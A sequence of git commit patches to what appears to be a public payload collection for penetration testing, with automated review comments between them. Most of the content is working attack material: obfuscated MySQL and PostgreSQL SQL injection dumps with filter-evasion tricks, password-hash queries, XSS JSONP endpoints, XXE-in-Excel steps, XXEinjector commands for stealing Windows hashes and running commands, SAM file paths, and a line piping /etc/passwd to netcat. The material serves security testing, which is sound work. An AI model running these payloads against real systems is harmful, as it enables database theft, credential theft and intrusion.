Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1, 2, 0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e), 
0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/+ + +-- ~tr0jAn Benchmark ++concat(0x3c666f6e7420636f6c6f723d7265643e3c62723e3c62723e7e7472306a416e2a203a3a3c666f6e7420636f6c6f723d626c75653e20,version(),0x3c62723e546f74616c204e756d626572204f6620446174616261736573203a3a20,(select count(*) from information_schema.schemata),0x3c2f666f6e743e3c2f666f6e743e,0x202d2d203a2d20,concat(@sc:=0x00,@scc:=0x00,@r:=0,benchmark(@a:=(select count(*) from information_schema.schemata),@scc:=concat(@scc,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d7265643e,LPAD(@r:=@r%2b1,3,0x30),0x2e20,(Select concat(0x3c623e,@sc:=schema_name,0x3c2f623e) from information_schema.schemata where schema_name>@sc order by schema_name limit 1),0x202028204e756d626572204f66205461626c657320496e204461746162617365203a3a20,(select count(*) from information_Schema.tables where table_schema=@sc),0x29,0x3c2f666f6e743e,0x202e2e2e20 ,@t:=0x00,@tt:=0x00,@tr:=0,benchmark((select count(*) from information_Schema.tables where table_schema=@sc),@tt:=concat(@tt,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,LPAD(@tr:=@tr%2b1,3,0x30),0x2e20,(select concat(0x3c623e,@t:=table_name,0x3c2f623e) from information_Schema.tables where table_schema=@sc and table_name>@t order by table_name limit 1),0x203a20284e756d626572204f6620436f6c756d6e7320496e207461626c65203a3a20,(select count(*) from information_Schema.columns where table_name=@t),0x29,0x3c2f666f6e743e,0x202d2d3a20,@c:=0x00,@cc:=0x00,@cr:=0,benchmark((Select count(*) from information_schema.columns where table_schema=@sc and table_name=@t),@cc:=concat(@cc,0x3c62723e,0x3c666f6e7420636f6c6f723d707572706c653e,LPAD(@cr:=@cr%2b1,3,0x30),0x2e20,(Select (@c:=column_name) from information_schema.columns where table_schema=@sc and table_name=@t and column_name>@c order by column_name LIMIT 
1),0x3c2f666f6e743e)),@cc,0x3c62723e)),@tt)),@scc),0x3c62723e3c62723e,0x3c62723e3c62723e)+ + +-- N1Z4M WAF ++/*!13337concat*/(0x3c616464726573733e3c63656e7465723e3c62723e3c68313e3c666f6e7420636f6c6f723d22526564223e496e6a6563746564206279204e315a344d3c2f666f6e743e3c68313e3c2f63656e7465723e3c62723e3c666f6e7420636f6c6f723d2223663364393361223e4461746162617365207e3e3e203c2f666f6e743e,database/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223306639643936223e56657273696f6e207e3e3e203c2f666f6e743e,@@version,0x3c62723e3c666f6e7420636f6c6f723d2223306637363964223e55736572207e3e3e203c2f666f6e743e,user/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223306639643365223e506f7274207e3e3e203c2f666f6e743e,@@port,0x3c62723e3c666f6e7420636f6c6f723d2223346435613733223e4f53207e3e3e203c2f666f6e743e,@@version_compile_os,0x2c3c62723e3c666f6e7420636f6c6f723d2223366134343732223e44617461204469726563746f7279204c6f636174696f6e207e3e3e203c2f666f6e743e,@@datadir,0x3c62723e3c666f6e7420636f6c6f723d2223333130343362223e55554944207e3e3e203c2f666f6e743e,UUID/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223363930343637223e43757272656e742055736572207e3e3e203c2f666f6e743e,current_user/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223383432303831223e54656d70204469726563746f7279207e3e3e203c2f666f6e743e,@@tmpdir,0x3c62723e3c666f6e7420636f6c6f723d2223396336623934223e424954532044455441494c53207e3e3e203c2f666f6e743e,@@version_compile_machine,0x3c62723e3c666f6e7420636f6c6f723d2223396630613838223e46494c452053595354454d207e3e3e203c2f666f6e743e,@@CHARACTER_SET_FILESYSTEM,0x3c62723e3c666f6e7420636f6c6f723d2223393234323564223e486f7374204e616d65207e3e3e203c2f666f6e743e,@@hostname,0x3c62723e3c666f6e7420636f6c6f723d2223393430313333223e53797374656d2055554944204b6579207e3e3e203c2f666f6e743e,UUID/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223613332363531223e53796d4c696e6b20207e3e3e203c2f666f6e743e,@@GLOBAL.have_symlink,0x3c62723e3c666f6e7420636f6c6f723d2223353830633139223e53534c207e3e3e203c2f666f6e743e,@@GLOBAL.h
ave_ssl,0x3c62723e3c666f6e7420636f6c6f723d2223393931663333223e42617365204469726563746f7279207e3e3e203c2f666f6e743e,@@basedir,0x3c62723e3c2f616464726573733e3c62723e3c666f6e7420636f6c6f723d22626c7565223e,(/*!13337select*/(@a)/*!13337from*/(/*!13337select*/(@a:=0x00),(/*!13337select*/(@a)/*!13337from*/(information_schema.columns)/*!13337where*/(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=/*!13337concat*/(@a,table_schema,0x3c666f6e7420636f6c6f723d22726564223e20203a3a203c2f666f6e743e,table_name,0x3c666f6e7420636f6c6f723d22726564223e20203a3a203c2f666f6e743e,column_name,0x3c62723e))))a))+ + +-- sharik +(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_name,0x203a3a20,column_name,0x3c62723e))))a) ``` ## MYSQL Current queries @@ -377,4 +395,4 @@ load data infile '\\\\error\\abc' into table database.table_name; - [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123) - [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased) - [ekoparty web_100 - 2016/10/26 - p4-team](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100) -- [Websec - MySQL - Roberto Salgado - May 29, 2013.](https://websec.ca/kb/sql_injection#MySQL_Default_Databases) \ No newline at end of file +- [Websec - MySQL - Roberto Salgado - May 29, 2013.](https://websec.ca/kb/sql_injection#MySQL_Default_Databases) From aef5bb864ae2050c7b8e071b3a39742a4918a1c9 Mon Sep 17 00:00:00 2001 
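Review bot: The `-- Zen` payload looks identical to the `make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(51...` query already present in the context line at the top of the hunk; if it is, drop the duplicate. The `~tr0jAn WAF`, `~tr0jAn Benchmark` and `N1Z4M WAF` entries are multi-kilobyte hex blobs in which most of the hex is HTML banner text rather than anything the query needs (`0x3c62723e` is `<br>`; the literal opening the N1Z4M payload decodes to `<address><center><br><h1><font color="Red">Injected by N1Z4M</font>`; the tr0jAn one to `<center><font color=red size=4><b>:: ~tr0jAn* Dump In One Shot Query`). That makes them hard to audit and hard to adapt; strip the banners, or add a one-line comment per payload saying what it outputs and which filtering it is meant to evade (`/*!12345sELecT*/` version-comment syntax, `%0a` and `%2b` URL encoding mixed into raw SQL, leading and trailing `+`). The `~tr0jAn Benchmark` variant drives its loops with `benchmark()`, which is CPU-heavy on the server; worth a warning to testers, and a distinctive signature for database-side monitoring.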
From: nizam0906 Date: Fri, 25 Oct 2019 22:27:16 +0530 Subject: [PATCH 079/222] Update jsonp_endpoint.txt Added 3 yahoo jsonp endpoints * https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337) * https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337) * https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y- --- XSS Injection/Intruders/jsonp_endpoint.txt | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/XSS Injection/Intruders/jsonp_endpoint.txt b/XSS Injection/Intruders/jsonp_endpoint.txt index e514d818..12add242 100644 --- a/XSS Injection/Intruders/jsonp_endpoint.txt +++ b/XSS Injection/Intruders/jsonp_endpoint.txt @@ -24,6 +24,9 @@ #Uber.com: "> #AOL/Yahoo +"> +"> +"> "> "> "> @@ -51,4 +54,4 @@ #GoogleAPI's "> "> -ng-app"ng-csp ng-click=$event.view.alert(1337)> \ No newline at end of file +ng-app"ng-csp ng-click=$event.view.alert(1337)> From f35ace93cf0655bbec0a753103899650e7a8b489 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Sat, 26 Oct 2019 18:07:14 +0530 Subject: [PATCH 080/222] Update PostgreSQL Injection.md Updated PostgreSQL Error Based injections --- SQL Injection/PostgreSQL Injection.md | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index c75ee733..b8d962dc 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md 
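Review bot: The three added lines show only `">` in this hunk; the `<script src=...>` element carrying each JSONP URL is not visible here, so the change cannot be checked against the endpoints named in the commit message (`ads.yap.yahoo.com/.../getAds.do?cb=`, `mempf.yahoo.co.jp/offer?...callback=`, `suggest-shop.yahooapis.jp/.../suggester?callback=`); please confirm the committed file has the complete lines. Two content points: the `#AOL/Yahoo` block now spans three different Yahoo domains, and the yahooapis.jp URL embeds a specific `appid` tied to one registered application, which can be revoked; each entry should carry the date it was verified, because third-party JSONP endpoints get fixed and the list goes stale silently.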
@@ -25,8 +25,13 @@ ```sql ,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC) ,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- -,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- +,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- ,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC) + +' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1 +' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1 +' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1 +' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1 ``` ## PostgreSQL Blind @@ -95,4 +100,4 @@ SELECT system('cat /etc/passwd | nc '); * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) * [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5) * [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803) -* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution) \ No newline at end of file +* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution) 
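Review bot: The `table_name=data_column` to `table_name='data_table'` fix is right: the old line compared against an unquoted placeholder, which PostgreSQL parses as a column reference. For the four new `' and 1=cast((...) as int) and '1'='1` lines: they leak the value only because the integer cast fails with `invalid input syntax for integer: "<value>"` and the application echoes the database error, and unlike the existing `chr(126)||...||chr(126)` lines they put no `~` delimiter around the value, so a purely numeric result casts cleanly and is silently lost. Suggest wrapping with `'~'||...||'~'` for consistency, plus one sentence noting that both forms require verbose database errors to reach the client, which is the application setting defenders should check.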
From 525429c0d88d0ca968c02880868029e26f5175dc Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sat, 26 Oct 2019 16:43:36 +0200 Subject: [PATCH 081/222] XPATH: add tools --- XPATH Injection/README.md | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md index 12bb05e4..bcbe72e0 100644 --- a/XPATH Injection/README.md +++ b/XPATH Injection/README.md @@ -7,6 +7,7 @@ * [Exploitation](#exploitation) * [Blind exploitation](#blind-exploitation) * [Out Of Band Exploitation](#out-of-band-exploitation) +* [Tools](#tools) * [References](#references) ## Exploitation @@ -47,8 +48,15 @@ x' or name()='username' or 'x'='y http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE') ``` +## Tools + +- [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents +- [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool +- [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text +- [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer) +- [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool + ## References * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)) -* [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/) * [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) From 3dcd4425a87012f147fd1b995b7ed81debf7bb26 Mon Sep 17 00:00:00 2001 
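Review bot: The `xpath-blind-explorer` entry is the only tool without a description, and it replaces the References entry that pointed at the original Google Code project (`code.google.com/p/xpath-blind-explorer/`) with a GitHub repository under a different account; mark it as a mirror (or keep the original link beside it) and add a one-line description like the others. Minor: the link text `XmlChor` differs from the repository name `XMLCHOR`.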
From: nizam0906 Date: Mon, 28 Oct 2019 16:26:49 +0530 Subject: [PATCH 082/222] Added more PostgreSQL Injection Queries * PostgreSQL version * PostgreSQL Current User * PostgreSQL List Users * PostgreSQL List Password Hashes * PostgreSQL List Privileges * PostgreSQL database name * PostgreSQL List databases * PostgreSQL List tables * PostgreSQL List columns * PostgreSQL Stacked query --- SQL Injection/PostgreSQL Injection.md | 76 +++++++++++++++++++++++++++ 1 file changed, 76 insertions(+) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index b8d962dc..d923c5a1 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -3,9 +3,19 @@ ## Summary * [PostgreSQL Comments](#postgresql-comments) +* [PostgreSQL version](#postgresql-version) +* [PostgreSQL Current User](#postgresql-current-user) +* [PostgreSQL List Users](#postgresql-list-users) +* [PostgreSQL List Password Hashes](#postgresql-list-password-hashes) +* [PostgreSQL List Privileges](#postgresql-list-privileges) +* [PostgreSQL database name](#postgresql-database-name) +* [PostgreSQL List databases](#postgresql-list-database) +* [PostgreSQL List tables](#postgresql-list-tables) +* [PostgreSQL List columns](#postgresql-list-columns) * [PostgreSQL Error Based](#postgresql-error-based) * [PostgreSQL Blind](#postgresql-blind) * [PostgreSQL Time Based](#postgresql-time-based) +* [PostgreSQL Stacked query](#postgresql-stacked-query) * [PostgreSQL File Read](#postgresql-file-read) * [PostgreSQL File Write](#postgresql-file-write) * [PostgreSQL Command execution](#postgresql-command-execution) 
@@ -20,6 +30,64 @@ /**/ ``` +## PostgreSQL Version + +```sql +SELECT version() +``` + +## PostgreSQL Current User + +```sql +SELECT user; +SELECT current_user; +SELECT session_user; +SELECT usename FROM pg_user; +SELECT getpgusername(); +``` + +## PostgreSQL List Users + +```sql +SELECT usename FROM pg_user +``` + +## PostgreSQL List Password Hashes + +```sql +SELECT usename, passwd FROM pg_shadow +``` + +## PostgreSQL List Privileges + +```sql +SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user +``` + +## PostgreSQL Database Name + +```sql +SELECT current_database() +``` + +## PostgreSQL List Database + +```sql +SELECT datname FROM pg_database +``` + +## PostgreSQL List Tables + +```sql +SELECT table_name FROM information_schema.tables +``` + +## PostgreSQL List Columns + +```sql +SELECT column_name FROM information_schema.columns WHERE table_name='data_table' +``` + ## PostgreSQL Error Based ```sql @@ -48,6 +116,14 @@ AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ``` +## PostgreSQL Stacked Query + +Use a semi-colon ";" to add another query + +```sql +http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));-- +``` + ## PostgreSQL File Read ```sql From ab341cff384ffc2f218a54bf08b67f1beb850f36 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Mon, 28 Oct 2019 16:51:36 +0530 Subject: [PATCH 083/222] Updated Blind XSS endpoint * User Agent * Comment Box --- XSS Injection/README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index a0ccd8af..f8cac694 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md 
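Review bot: `SELECT usename FROM pg_user;` under `## PostgreSQL Current User` lists every role, not the current one, and the same query is already the whole of `## PostgreSQL List Users`; remove it from the current-user block. `SELECT usename, passwd FROM pg_shadow` only works for superusers (`pg_shadow` is not readable by ordinary roles), which deserves a word of qualification since the section otherwise reads as if it works from any session. The TOC text `PostgreSQL List databases` links to `#postgresql-list-database` and the heading is `## PostgreSQL List Database`; the anchor resolves, but the wording should match. Small: the `Version` block has no trailing semicolon while `Current User` does; pick one.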
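Review bot: `Use a semi-colon ";" to add another query` needs the caveat that stacked statements only run when the application sends the text as a simple query (`pg_query()` in PHP, `psql`, and similar); libpq's extended protocol and prepared statements reject a second command (`cannot insert multiple commands into a prepared statement`), so the `create table NotSoSecure` probe failing does not mean the injection is absent. The example is a URL inside a `sql` fence; a plain fence with the injected part (`';create table NotSoSecure (data varchar(200));--`) highlighted reads better. Also `semi-colon` should be `semicolon`.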
@@ -416,6 +416,12 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu - Referer Header - Custom Site Analytics - Administrative Panel logs +- User Agent + - Custom Site Analytics + - Administrative Panel logs +- Comment Box + - Administrative Panel + ## Polyglot XSS From 135af74acda9b37a3febf14950dd0de91d923d9d Mon Sep 17 00:00:00 2001 From: duongdpt Date: Mon, 28 Oct 2019 22:26:28 +0700 Subject: [PATCH 084/222] Update README.md Add bypass waf using BETWEEN --- SQL Injection/README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 8099f6df..8d5162bd 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -440,12 +440,13 @@ SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1). SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d ``` -No Equal - bypass using LIKE/NOT IN/IN +No Equal - bypass using LIKE/NOT IN/IN/BETWEEN ```sql ?id=1 and substring(version(),1,1)like(5) ?id=1 and substring(version(),1,1)not in(4,3) ?id=1 and substring(version(),1,1)in(4,3) +?id=1 and substring(version(),1,1) between 3 and 4 ``` Blacklist using keywords - bypass using uppercase/lowercase @@ -461,7 +462,7 @@ Blacklist using keywords case insensitive - bypass using an equivalent operator ```sql AND -> && OR -> || -= -> LIKE,REGEXP, not < and not > += -> LIKE,REGEXP, BETWEEN, not < and not > > X -> not between 0 and X WHERE -> HAVING ``` From 5094ef8b108056199f3d84af782803e9ac4feeff Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 28 Oct 2019 20:46:19 +0100 Subject: [PATCH 085/222] XXE in XLSX --- XXE Injection/README.md | 52 +++++++++++++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index 58017175..b11ebd9f 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md 
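Review bot: `Comment Box -> Administrative Panel` is listed as a blind-XSS endpoint, but the entry does not say where the payload fires: it is blind only when the comment is moderated or rendered in an admin view the tester cannot see, otherwise it is ordinary stored XSS. Spell that out as the other entries do (`Administrative Panel logs`) so the list stays a list of out-of-sight sinks. The `User Agent` entry is fine; its sub-items duplicating the `Referer Header` ones is expected.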
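Review bot: The example `?id=1 and substring(version(),1,1) between 3 and 4` is a range test (true for '3' or '4'), not an equality, so it does not demonstrate the `No Equal` bypass the heading promises; `between 5 and 5` is the equality form and should be the example shown. For the filtering side, `BETWEEN`, `LIKE`, `IN` and `REGEXP` are all keyword-level evasions of an `=`-only rule, so the fix is a grammar-aware filter or parameterised queries, not adding `between` to a blocklist.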
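Review bot: In the operator table `= -> LIKE,REGEXP, BETWEEN, not < and not >` presents `BETWEEN` as a drop-in for `=`, which only holds as `BETWEEN X AND X`; write it that way, consistent with the existing `> X -> not between 0 and X` line below it.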
@@ -30,6 +30,7 @@ Syntax: `` - [XXE inside SVG](#xxe-inside-svg) - [XXE inside SOAP](#xxe-inside-soap) - [XXE inside DOCX file](#xxe-inside-docx-file) + - [XXE inside XLSX file](#xxe-inside-xlsx-file) ## Tools @@ -382,6 +383,56 @@ JPG (experimental) GIF (experimental) ``` +### XXE inside XLSX file + +Extract the excel file. + +```powershell +$ mkdir XXE && cd XXE +$ unzip ../XXE.xlsx +Archive: ../XXE.xlsx + inflating: xl/drawings/drawing1.xml + inflating: xl/worksheets/sheet1.xml + inflating: xl/worksheets/_rels/sheet1.xml.rels + inflating: xl/sharedStrings.xml + inflating: xl/styles.xml + inflating: xl/workbook.xml + inflating: xl/_rels/workbook.xml.rels + inflating: _rels/.rels + inflating: [Content_Types].xml +``` + +Add your blind XXE payload inside `xl/workbook.xml`. + +```powershell + + ]> +&xxe; + +``` + +Rebuild the Excel file. + +```powershell +$ zip -r ../poc.xslx * +updating: [Content_Types].xml (deflated 71%) +updating: _rels/ (stored 0%) +updating: _rels/.rels (deflated 60%) +updating: docProps/ (stored 0%) +updating: docProps/app.xml (deflated 51%) +updating: docProps/core.xml (deflated 50%) +updating: xl/ (stored 0%) +updating: xl/workbook.xml (deflated 56%) +updating: xl/worksheets/ (stored 0%) +updating: xl/worksheets/sheet1.xml (deflated 53%) +updating: xl/styles.xml (deflated 60%) +updating: xl/theme/ (stored 0%) +updating: xl/theme/theme1.xml (deflated 80%) +updating: xl/_rels/ (stored 0%) +updating: xl/_rels/workbook.xml.rels (deflated 66%) +updating: xl/sharedStrings.xml (deflated 17%) +``` + ## References 
@@ -403,3 +454,4 @@ GIF (experimental) * [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) - [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) +- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) \ No newline at end of file From 52119907f6c6dfac5c1662da865d602fbc14ae5b Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Tue, 29 Oct 2019 00:41:04 +0100 Subject: [PATCH 086/222] add XXEinjector --- XXE Injection/README.md | 28 ++++++++++++++++++++++++++-- 1 file changed, 26 insertions(+), 2 deletions(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index b11ebd9f..d4792dd6 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md 
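Review bot: `zip -r ../poc.xslx *` has the extension misspelled (`xslx`), so the rebuilt file will not be treated as a workbook; it should be `poc.xlsx`. The `unzip` and `zip` listings do not match (the second includes `docProps/` and `xl/theme/`, which the first never extracted, and `zip` prints `updating:` as if the archive already existed), so the two transcripts come from different runs; regenerate them from one run. The `xl/workbook.xml` snippet has lost its XML markup in this view (only `]>` and `&xxe;` remain); check that the committed file still carries the full `<!DOCTYPE ... [<!ENTITY xxe SYSTEM "...">]>` declaration. Fences: `powershell` for `mkdir`/`unzip`/`zip` shell sessions and for an XML fragment; `bash` and `xml` fit. One line for defenders would help: any XLSX import path has to parse `xl/workbook.xml`, so a parser with external entity resolution enabled is the vulnerable configuration and disabling DTD/external entity processing in it is the fix.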
@@ -42,7 +42,31 @@ Syntax: `` ``` $ python3 230.py 2121 ``` - + - [XXEinjector](https://github.com/enjoiz/XXEinjector) + ```bash + # Enumerating /etc directory in HTTPS application: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl + # Enumerating /etc directory using gopher for OOB method: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher + # Second order exploitation: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt + # Bruteforcing files using HTTP out of band method and netdoc protocol: + ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc + # Enumerating using direct exploitation: + ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK + # Enumerating unfiltered ports: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all + # Stealing Windows hashes: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes + # Uploading files using Java jar: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf + # Executing system commands using PHP expect: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls + # Testing for XSLT injection: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt + # Log requests only: + ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt + ``` ## Detect the vulnerability 
@@ -454,4 +478,4 @@ updating: xl/sharedStrings.xml (deflated 17%) * [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) - [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) -- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) \ No newline at end of file +- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) From bb2c2471604761976445d54de2b4a936b034c1df Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Tue, 29 Oct 2019 10:32:39 +0530 Subject: [PATCH 087/222] Added List Database Administrator Accounts SELECT datname FROM pg_database --- SQL Injection/PostgreSQL Injection.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index d923c5a1..2bf952ce 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -7,6 +7,7 @@ * [PostgreSQL Current User](#postgresql-current-user) * [PostgreSQL List Users](#postgresql-list-users) * [PostgreSQL List Password Hashes](#postgresql-list-password-hashes) +* [PostgreSQL List Database Administrator Accounts](#postgresql-list-database-administrator-accounts) * [PostgreSQL List Privileges](#postgresql-list-privileges) * [PostgreSQL database name](#postgresql-database-name) * [PostgreSQL List databases](#postgresql-list-database) 
@@ -57,7 +58,10 @@ SELECT usename FROM pg_user ```sql SELECT usename, passwd FROM pg_shadow ``` - +## PostgreSQL List Database Administrator Accounts +```sql +SELECT usename FROM pg_user WHERE usesuper IS TRUE +``` ## PostgreSQL List Privileges ```sql From bb7e6b7cd0587903fc3040b3699f517fae02b2b0 Mon Sep 17 00:00:00 2001 From: Hi15358 Date: Tue, 29 Oct 2019 16:23:39 +0800 Subject: [PATCH 088/222] Update README.md --- Directory Traversal/README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index 1420178b..afa72bd3 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -144,6 +144,8 @@ c:/unattend.txt c:/unattend.xml c:/unattended.txt c:/unattended.xml +c:/windows/repair/sam +c:/windows/repair/system ``` The following log files are controllable and can be included with an evil payload to achieve a command execution @@ -164,4 +166,4 @@ The following log files are controllable and can be included with an evil payloa ## References * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack) -* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html) \ No newline at end of file +* 